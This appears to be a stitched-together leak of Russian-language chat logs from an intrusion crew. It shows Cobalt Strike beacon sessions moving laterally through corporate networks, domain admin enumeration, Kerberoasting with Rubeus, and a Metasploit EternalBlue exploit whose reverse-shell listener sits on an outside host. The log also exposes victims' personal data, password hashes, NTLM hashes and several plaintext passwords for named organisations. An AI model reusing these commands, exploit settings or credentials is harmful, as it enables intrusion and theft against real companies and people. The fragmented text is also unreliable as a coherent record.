e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c 51692370
a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e AF2319AB
a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 9569F458
06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a 564273C6
42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c 1D849510
03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 1234
a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 CBCB9373
fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 127010CA
fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 FFC77685
2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 BACBC590
c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 D4FF4357
9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e CDDAC102
``@tl1 хэши чекнуть можно?``
User Id User Password Email Id Middle Name Last Name First Name
HP20196201010102538109914HP 8eb99a99dde701da48e6150d801ad8c489e0de5599a11fd7e7bd18ebc32a64a9 harjeetroadlines95+11@gmail.com Singh Vinod
HP20196201010142798572023HP 0293fbd8830316737c35ec729612de73c204e35d14c8d627169ec4e2a2e3af9a harjeetroadlines95+12@gmail.com Shinde Suresh
HP2019620101016624821422HP fa2add98c1722c776b4e85a66c88fdf49a5c395ba64471fb0011d2ab1c7897b1 harjeetroadlines95+45@gmail.com Singh Daljeet
HP20196201010184360973695HP 28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 harjeetroadlines95+15@gmail.com singh Tulsi
HP20196201010225863663965HP 20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 harjeetroadlines95+48@gmail.com bhaurao Shelke Manik
HP20196201010269661194147HP 6bbfa3023e958dd30762b74abc3be2d37011b9471c4c6848550b4c268cabaa9f harjeetroadlines95+53@gmail.com Shoib Mohd
HP20196201010312857813028HP de5d3c3ab9122d51c37a0dab08ba1a96d8e276b44a4888b837a3326e5a7d1fb0 harjeetroadlines95+19@gmail.com Kumar yadav Ajay
HP20196201010355940386359HP 0724211d5b4f0a3885a48eb47c8bf698578f6582127f76f517daa083046f2d1f harjeetroadlines95+29@gmail.com Prasad yadav Bhola
HP20196201010396384455535HP e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c harjeetroadlines95+24@gmail.com Yadav Santosh
HP2019620101059773261151HP 64a4837d5761bb401f089c999cde3ec2316195f46e602d30c0089a2644d34c09 harjeetroadlines95+5@gmail.com Pandey Sanjay
HP2019620106501991951580HP 18b0b6265c6965aea7d75fa147094d89cbedac2153540cbd1e7ffa829cf28000 harjeetroadlines95+14@gmail.com Ali Farman
HP2019620106543854136534HP a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e harjeetroadlines95+52@gmail.com Kumar yadav Manoj
HP2019620106583623832858HP a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 harjeetroadlines95+44@gmail.com Ahmed Mustaq
HP2019620107126389961096HP 4d081a605ec6f5c420b4f0498efccd6af3880b3b4abbeb700eca35d5a14cffb6 harjeetroadlines95+32@gmail.com singh Amritpal
HP2019620107166277311185HP 06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a harjeetroadlines95+36@gmail.com Sharma Surendra
HP2019620107208559417976HP 42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c harjeetroadlines95+49@gmail.com Singh Paramjit
HP2019620107248623258019HP 9b3957be4c45929c47d7cf447105a2488460da7044b147aa715f2c3dd55f32f4 harjeetroadlines95+43@gmail.com Khan Sohel
HP201962010726835843708HP 03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 harjeetroadlines95+38@gmail.com Yadav Chandrajeet
HP2019620107291687742668HP 564b77746834fac1a3fbd08bb75c5ca418ae22c32ec6fd99697e2c9de5beee17 harjeetroadlines95+22@gmail.com Kuddus Abdul
HP2019620107332167491575HP 8acc6699e1efd4e2d089011a45e55c7f17fd09c34e89a9a4c5259aa1ed218b31 harjeetroadlines95+23@gmail.com singh Raviraj
HP2019620107374005617063HP ef9505d24415cc7f19baef0bbf47f39e9f5e69f26fb82ee2769af3ec020f2f36 harjeetroadlines95+51@gmail.com Saroj Lalji
HP2019620107418163901165HP 43f079f13bbc55a963b810e7f6a101c6e234634dccd27898d4be234b94fc0351 harjeetroadlines95+40@gmail.com Yadav Bhuneshwar
HP201962010745425411913HP b1448c1fe3d2d0252198101ac75580a38cd24296453736f2698800ce8291a9a7 harjeetroadlines95+9@gmail.com kumar Sushil
HP2019620107459870763681HP a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 harjeetroadlines95+20@gmail.com Singh Sukhdev
HP2019620107508772408904HP 39f504edb611f64f85ac2fedda7965a966df33c21a0764b70d122b69bc10a1ef harjeetroadlines95+1@gmail.com Faisal Mohd
HP201962010755579004247HP e4b4c3e134a9e29c2ec3b483f4b5388a742165d49b9fa6896ca09ae5f4742665 harjeetroadlines95+7@gmail.com S Yadav Ramraj
HP2019620107594925018904HP c16fe0b02048b17c3193c17e5c3418dbb1341b5d15b73a90c7111dc960b6dea3 harjeetroadlines95+33@gmail.com singh Navkarandeep
HP201962010787333855982HP fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 harjeetroadlines95+21@gmail.com Kumar Akhilesh
HP201962010816555033866HP edb5656900c6b3e667de00038bda04127868ee861f2b5225afadb6960b69cc50 harjeetroadlines95+6@gmail.com Kumar Pradeep
HP2019620108202746958327HP 26c2e1daf8a8174bc999e72b1b9c92c3477977884bad3f889735e4e45a324dda harjeetroadlines95+26@gmail.com Yadav Vinod
HP2019620108263742055697HP 58895edc24dbf57a57518af35ebb42c33dffe8cc94bb8851c962a55e5a960aad harjeetroadlines95+46@gmail.com Yadav Rambrij
HP2019620108304916009069HP caf7d1996d96a5ce4f25cf82250d2d2825785a295d0ca05106f055d20392c9e7 harjeetroadlines95+13@gmail.com Yadav Yogendra
HP2019620108346644272108HP e844104206d88758840a8f77e6dcc0f9b917e1b3d3e11655297c6340ce2f3734 harjeetroadlines95+3@gmail.com Yadav Ramdaras
HP201962010836190078047HP 025750f879fba28d4d251ce0f2d023a17f4114d2e9e4f1e64e401e71559b414d harjeetroadlines95+54@gmail.com singh Vinod
HP2019620108387071096273HP 419e4e274b748c7a247c6e0edbccc7e2d04244c915f2f73fe8509b31cecb29e7 harjeetroadlines95+47@gmail.com Khan Salman
HP2019620108428759387650HP 817953730feb1dddc4aeff1098b1ca4781ca8e65456872be24f3f904589003 harjeetroadlines95+27@gmail.com kumar tiwari Abhimanyu
HP2019620108472108246672HP 4cc427c04edca8e7ff1b9c8301842d5f0b1d1cd40e99d95cdf036beafac0e7e1 harjeetroadlines95+8@gmail.com mishra Kripashankar
HP2019620108511300311348HP 187db3e24a345628fbd7f897a1e76a55ab5e22c01561d52b239f840e67bd59fb harjeetroadlines95+41@gmail.com Singh Mangal
HP2019620108554546177564HP fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 9881318592@abcxyz.iin Kumar singh
HP2019620108595175932621HP 2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 harjeetroadlines95+35@gmail.com Singh Gurbinder
HP201962010877746921752HP 753d8a9ccd60617d73ff1c2b945ee1374e80fd3e9bbc8485c020a3ae46c792f8 harjeetroadlines95+10@gmail.com Pandey Kuldeep
HP2019620109127897736262HP fdb9c838fd85f213933cb7342d6d21d7508dbf31b9ca8ad1c00b672c04fa87e8 harjeetroadlines95+39@gmail.com Asare Ram
HP2019620109217794143490HP 0f91dbf8da8988f7f79476e17eb87b294c086142f6a452fa2332285e3c40e402 harjeetroadlines95+31@gmail.com kumar saroj Harihar
HP2019620109261508147074HP 15c4e7a3d2c1e7983a9ff4f59d6a701b965f1d0ad11038c7a4b8a44e9f48a34e harjeetroadlines95+34@gmail.com saroj Rammurat
HP2019620109303478651104HP f44f1c235edd95e7f958fd3b6bcdb41a04daecfe3f99d9499187a9d9d5fe2876 harjeetroadlines95+2@gmail.com yadav Chotelal
HP201962010938554818780HP c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 harjeetroadlines95+30@gmail.com Singh Ravendra
HP2019620109397620666116HP 4c5041f14fbe628c79c03a4f302afcfee51d7ee7daec50747b9b619fb1211f27 harjeetroadlines95+17@gmail.com Sahani Jitendra
HP201962010944646843344HP 5ba88e4137d7233d3c42e36b7f9dcca9138504343f89324641d286ba52ffbf80 harjeetroadlines95+4@gmail.com Yadav ShivPrasad
HP2019620109488162287045HP 9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e harjeetroadlines95+50@gmail.com Singh DALJEET
HP2019620109529879135556HP 54d6154b9ef93bb6ac2e7db335913102dce130de7a081a19a4ea0dd5cff898ae harjeetroadlines95+18@gmail.com pratap yadav Mahendra
HP2019620109573398884992HP c28de86389b6ebc8e646d13602d153b2ffdad50e69c69e6376e10c0c6dab7 harjeetroadlines95+37@gmail.com Kumar singh Raj
HP201962010987142216555HP 769c174ad96ac9a01348043f932c22cbde1a65c934354b273db481b329864722 harjeetroadlines95+25@gmail.com Sankar Sankar
``````
[-] Could not open service control manager on \\192.168.1.169: 1722
``как понять 1722 ?не понялв смысле ?1722``
am connecting services.msc to other computer from my machine and got ... AM (From:Configuration Manager Software Updates Management).
``````
beacon> remote-exec psexec \\192.168.1.169 process list
[*] Tasked beacon to run 'process list' on \\192.168.1.169 via Service Control Manager
[-] Could not open service control manager on \\192.168.1.169: 1722
[+] host called home, sent: 1777 bytes
``````
user 2-2[ABINASHP]abinash.pattnayak/5776|2020Oct07 19:52:33> remote-exec psexec \\192.168.9.42 ipconfig /flushdns
[Tasked beacon to run 'ipconfig /flushdns' on \\192.168.9.42 via Service Control Manager
[-] Could not open service control manager on \\192.168.9.42: 5
[+] host called home, sent: 2011 bytes
[-] Could not open service control manager on \\192.168.9.42: 5
```psexec_command тогда``
beacon> run wmic /node:192.168.1.169 process list brief
[*] Tasked beacon to run: wmic /node:192.168.1.169 process list brief
[+] host called home, sent: 61 bytes
[+] received output:
Node - 192.168.1.169
ERROR:
Description = The RPC server is unavailable.
``или архитектурузапросите список процессовпоробуйте вмик?
beacon> run dir \\192.168.9.169\ADMIN$
[*] Tasked beacon to run: dir \\192.168.9.169\ADMIN$
[+] host called home, sent: 44 bytes
[-] could not spawn dir \\192.168.9.169\ADMIN$: 2
``пробуйте сразу шару `ADMIN$`у других двух так же?нетshell не работает?`could not spawn?
beacon> run dir \\192.168.9.42\C$
[*] Tasked beacon to run: dir \\192.168.9.42\C$
[+] host called home, sent: 39 bytes
[-] could not spawn dir \\192.168.9.42\C$: 2]
```а если просто `dir \\192.168.9.42\C$`?``
beacon> run whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 24 bytes
[+] received output:
ad\abinash.pattnayak
``shell whoami?
beacon> run net use * \\192.168.9.42\C$ /persistent:no
[Tasked beacon to run: net use * \\192.168.9.42\C$ /persistent:no
[+] host called home, sent: 60 bytes
[+] received output:
The password is invalid for \\192.168.9.42\C$.
```
```
beacon> run net use * \\192.168.9.169\C$ /persistent:no
[Tasked beacon to run: net use * \\192.168.9.169\C$ /persistent:no
[+] host called home, sent: 61 bytes
[+] received output:
The password is invalid for \\192.168.9.169\C$.
Enter the user name for '192.168.9.169'.
```[ ](https://mediaeveryone.com/group/happay-in?msg=pkt4xfiMymwKJftue) почемуперешлите кеб на всякийПодключится к этим тачкам не получаетсяsudhirкерб ДА выше3 тачки с админ правами``
user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:13:04> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain ad.happay.in.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
abhinav.bhaskar Administrator anshul
chandan koushik.s mohit.goel
nitin.choudhary pritam sudhir
varun vivek.kumar
The command completed successfully.
``ммм``
beacon> net share \\192.168.9.169
[*] Tasked beacon to run net share on 192.168.9.169
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \\192.168.9.169:
Share name Comment
---------- -------
[+] received output:
ADMIN$ Remote Admin
C$ Default share
HP OfficeJet Pro 8710 PCL-3
IPC$ Remote IPC
print$ Printer Drivers
```
```
beacon> net share \\192.168.9.42
[*] Tasked beacon to run net share on 192.168.9.42
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \\192.168.9.42:
Share name Comment
---------- -------
[+] received output:
ADMIN$ Remote Admin
C$ Default share
IPC$ Remote IPC
```
```
beacon> net share \\192.168.1.185
[*] Tasked beacon to run net share on 192.168.1.185
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \\192.168.1.185:
Share name Comment
---------- -------
[+] received output:
ADMIN$ Remote Admin
C$ Default share
IPC$ Remote IPC
``````
user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:09:59> execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt
[Tasked beacon to run .NET program: Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt
[+] host called home, sent: 320189 bytes
[+] received output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[+] host called home, sent: 64 bytes
[+] received output:
[*] Total kerberoastable users : 1
[*] SamAccountName : sudhir
[DistinguishedName : CN=Sudhir Kumar. Thapa,OU=IT-Team,OU=Users,OU=HAPPAY,DC=ad,DC=happay,DC=in
[*] ServicePrincipalName: AgpmServer/HAPPAYADSERVER.ad.happay.in/ad.happay.in
[PwdLastSet : 25-09-2020 12:45:35
[*] Supported ETypes : RC4_HMAC_DEFAULT
[Hash written to C:\ProgramData\Rubeus_hashes_full.txt
[*] Roasted hashes written to : C:\ProgramData\Rubeus_hashes_full.txt
```в ручную чекаюнеттам много пк?тогда запуститеПока нетне получилось подняться ничем более?@tl1 можно запустить шарфайндер?``
User Password Email Id
Happay@81 isha_wattle@geojit.com
Happay@82 jasdeep_k@geojit.com
Happay@83 karmjeet_kaur@geojit.com
Happay@84 rohit_kumar@geojit.com
Happay@85 sumit_sharma@geojit.com
Happay@86 sunil_chhabra@geojit.com
Happay@87 joga_singh@geojit.com
Happay@88 kimat_r@geojit.com
Happay@89 om_parkash@geojit.com
Happay@90 puneet_p@geojit.com
Happay@91 shashank_jain@geojit.com
Happay@92 vishesh_k@geojit.com
``````
Happy@26265
Gopal@26265
Abinash@26265
````ad.happay.in [192.168.1.12]````
HAPPAYADSERVER 192.168.1.2
HAPPAYADCSERVER 192.168.1.12
``пожалуйстаспасибоuser7192.168.43.108user4``
[+] 192.168.1.2:445 - 192.168.1.2:445 - Success: '.\abinash.pattnayak:aad3b435b51404eeaad3b435b51404ee:b4e99243a0b9c8fa481d2307a26cc933'
``угу, но учетка не админа(``
[+] 192.168.9.212:445 - 192.168.9.212:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
[+] 192.168.9.169:445 - 192.168.9.169:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
[+] 192.168.9.42:445 - 192.168.9.42:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
[+] 192.168.1.185:445 - 192.168.1.185:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865'
``1) тестируй нормально, я говорил обновить АД
2) впн таки был отключен``
C:\Users\user>ping -n 1 BI-SANDBOX.evo.local
Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again.
C:\Users\user>ping -n 1 CHEECH.evo.local
Pinging CHEECH.evo.local [172.17.70.16] with 32 bytes of data:
Reply from 172.17.70.16: bytes=32 time=66ms TTL=126
Ping statistics for 172.17.70.16:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 66ms, Maximum = 66ms, Average = 66ms
``сейчас буду проверятьБез измененийPing request could not find host HQ-DC-2.evo.local. Please check the name and try again.а дк доступен?странно...Windows Server 2008пользовательские?На машины на которых шарилсяВОзможно vpn отвалился
Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again.да нет креды естьа они нужны?Под пользаком без прав+есть?ps commandя ждудавай нагрузкусамому интересноэто как так?у меня realtime prot включился сам))доступенneteric.comи нагрузку сразу если окя пиганудомен только дайдаps command подойдет?и нагрузкадомендана дедике?повислаи под сесией идется в азурпо моему у него дампается фв азур другой типок ходитEVO\bplehal
```
https://apps.sematext.com/ui/monitoring/19585/solrCloudOverviewReportPage
https://portal.azure.com/#@evo.com/resource/subscriptions/eaa8f156-823c-4beb-91bb-bd6703f0c0e6/resourceGroups/www-production/providers/microsoft.insights/components/evodotcom/overview
Можно попробовать под кредами да
http://evosolr.southcentralus.cloudapp.azure.com/solr/#/~cloud
```уже) спасибо)это надо у @user3 спрашиватьпривет, а напомни ссылку наш форум пожалуйстата оффа во входной же кобе была ещё одна сессия с этого домена, кто то её отрабатывал, закрепа нет?этот пользак только в трастах пусто?мб в этом дело... угу((```
'nbtstat' is not recognized as an internal or external command,
operable program or batch file.
``nbtstat не помогнет, я могу ошибаться какие то шз я брал из портскана. И так, брал хост нам делал пинг и по 24-й на 445 их в скан. Выходит что в теории он может быть с другого домена.то хостнейм ты и так знаешьесли он взят из ад_комп текущегоэээ стоп не понимаюне возвращает хост намеОн с текушего домена взят из ад_комп.только в рамках одного доменакроссдоменная авторизация так не сработаетя про хост который атакуем1 мин+а он точно от этого домена?+yesа креды валидные?``
msf6 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 10.7.0.73 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain CORP.TELEVISA.COM.MX no The Windows domain to use for authentication
SMBPass R8WTksIOle1rP8)P no The password for the specified username
SMBUser Hgutierreze no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 23.106.160.50 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 23.106.160.50:4444
[*] 10.7.0.73:445 - Authenticating to 10.7.0.73 as user 'Hgutierreze'...
[-] 10.7.0.73:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_TRUSTED_RELATIONSHIP_FAILURE (Command=115 WordCount=0)
[Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) >
``пару минлюбые валидные доменныену типаКлиренс?это когда кред не хватает``
[-] 10.7.0.73:445 - Unable to find accessible named pipe!
``доменные любые добавьнета креды в опциях есть?
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 23.106.160.50:4444
[*] 10.7.0.73:445 - Target OS: Windows Server 2008 R2 Enterprise 7600
[-] 10.7.0.73:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
``вроде умеешь... ты же тцп_бинд вроде юзал уже...умешь так ?и забиндиться через пайпкароч смотри
ты можешь запустить там стейджлесс пейлоадне отрабатывает как? не пускает сессию? или ошибка?Все проверилне отрабатывает)да
вероятноexploit/windows/smb/ms17_010_psexecне вижу у него такого. Этот может admin/smb/ms17_010_command но он не отрабатывает и по моему может это exploit/windows/smb/ms17_010_psexecпосмотри в опцияхчерез этернал блу?ага
смотри... там вроде модуль умеет запускать ехе через этот сплойт?нета _command пашет?``
[*] 10.7.0.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.7.0.73:445 - Host is likely VULNERABLE to MS17-010 - Windows Server 2008 R2 Enterprise 7600 x64 (64-bit)
[*] 10.7.0.73:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 30 e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 12 Groom Allocations.
[10.7.0.73:445 - Sending all but last fragment of exploit packet
[10.7.0.73:445 - Starting non-paged pool grooming
[10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[10.7.0.73:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 10.7.0.73:4444
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 30 e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 17 Groom Allocations.
[10.7.0.73:445 - Sending all but last fragment of exploit packet
[10.7.0.73:445 - Starting non-paged pool grooming
[10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[10.7.0.73:445 - Triggering free of corrupted buffer.
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 30 e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 22 Groom Allocations.
[10.7.0.73:445 - Sending all but last fragment of exploit packet
[10.7.0.73:445 - Starting non-paged pool grooming
[10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[10.7.0.73:445 - Triggering free of corrupted buffer.
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
``и какая ось?а первый вопрос?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=Y64nWyXyE2kdkcJyf) хзтачка видит инет?сканнер говорит что уязвима?нашел 1710 но проэксплуатировать не удается.пока ничего, пробуем другие методы, на этих 2-х тячках вообще ничего не сделатьтак тут у нас что?хмОн первые два раза не снимал, а потом снял. ХЗ может я криво сохранил, но точно знаю что переснимал был оборванили как там эта хуйня называетсяget-computersснять через пш командлетомесли ад файнд не снимает полностьюне тупиad_find.exeCMDНет через смдя говорю снять ад пшты о чем?)Нет, через cmdчерез пш?Хуйня какая тоВижу, я же его два раза переснимал.ты же в курсе что он не полный?который ты скинул?69 по ad_computers``
ASPDC4$
ASPDC5$
ASPDPM2$
CFSQL2$
CFSQLTEST1$
CFWEB1$
CFWEBTEST1$
WIN7_VM$
sccmservice1$
ASPDPM3$
ASPVCS1$
WIN7VDI-PC$
BOBM$
BBCTX3$
BBCTX2
BBCTX4$
BBCTX1$
BBGW3$
ASPUTIL2$
ASPXA3$
BBGW1
FCCTX3$
CFCTX2$
WMLXA1$
ASPXA1$
XENAPP76$
ASPXA7$
XENAPP71-2
ASPXA9$
CFHV1
BBCTX6
ASPXA5$
ASPFS1
BBCTX5
BBCTX7
ASPSQL2
ASPXA6$
BBCTX8
ASPXA4$
CFXA1$
ASPXA2$
ASPXA10$
ASPXA8$
XENAPP71
RCMTESTTS$
ASPSAN2012$
RCM2012$
ASPUTIL3$
NTIXA1$
NTIGSS1
NTISAGE1$
NTISAGE2$
ASPXA11$
PHXADC1$
PHXA-1$
ASPXA65TEMPLATE$
XENAPP76PILOT$
USCXA1$
USCFS1$
ASPSYM1$
KOMIGTEST2008R2$
DRUTIL01$
ASPDC3$
MVEXA1$
DMGXA1$
MVEFS1$
NTIW71$
EGMANAGER$
EGCOLLECTOR$
``сколько всего пк было?С того он не работает так долго .с чего ты взял?оно все позависалонетинвок шар закончил?В ситриксдля aspsql2svc There are no resources currently available for this user.Админ залочил``
Your credentials are invalid. Try again or contact your system administrator.
```Ранее не замечал тако его всегда юзаемпалится скрипт?В него передается список хостов это автобрут, не смбЛогинсписок хостов?даlfпоследняя команда?бррпочему не работает?https://github.com/leaderimStalin/psbrau/blob/main/Invoke-SMBAutoBrute.ps1что за автобрут?автоБрут по ходу не работает в тпшмб где админ будетладно
смотри смбшары под 2 пользакамипару мину этого``
C:\Windows\system32
BBCTX5 @ MAPCIASP\aspsql2svc
``нет юзер пользака под которым сессияда етп)[ ](https://mediaeveryone.com/group/mapciasp-com?msg=bctF5N752KHAooiC4) ?net useчто этодай нет юзерЯ знаю)так она на текущем хосте)``
C:\Windows\system32
BBCTX5 @ MAPCIASP\aspsql2svc
```сесия в тпш есть под ними``
Но под этими кредами могу запускать cmd and ps
```такnfrты же говоришь access denied?где запускать и как?Но под этими кредами могу запускать cmd and psДоступ закрытLjcneg pfrhsnкакая ошибка?По разному, wmic, ViewSQLкак пробуешь, что не подключает?Чего не понимаешь? С этими кредами не подключитесь к серверу ASPSQL2.mapciasp.com. Под этими кредам и не запустить нагрузку. Эти креды = user:aspsql2svc pwd:map#2013я чего то не понимаю``
Не подключиться с кредами на ASPSQL2.mapciasp.com, через wmic не посмотреть дериктории
